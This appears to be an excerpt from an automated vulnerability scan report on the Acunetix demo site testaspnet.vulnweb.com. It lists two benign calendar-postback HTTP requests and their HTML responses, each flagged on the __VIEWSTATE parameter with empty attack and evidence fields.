Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8464&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAQJAMHdsIZGRk0yf7m2NpFQzCRiWuRT0k2WH7Gk4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL1rJarBALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJkTOP0NAHuPUDKt%2F7fqVnzAU9ohM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:39 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAQJAMHdsIZGRk0yf7m2NpFQzCRiWuRT0k2WH7Gk4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL1rJarBALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJkTOP0NAHuPUDKt/7fqVnzAU9ohM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:White" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8463&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCA1mVDHNsIZGRkv2re9D9mRmp4QVOOGndWK9ViApc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLo8%2BoAQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ9CbeFF6s%2B7CNVLchcNKFqlB%2BvKQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:45 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCA1mVDHNsIZGRkv2re9D9mRmp4QVOOGndWK9ViApc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLo8+oAQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ9CbeFF6s+7CNVLchcNKFqlB+vKQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:White" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
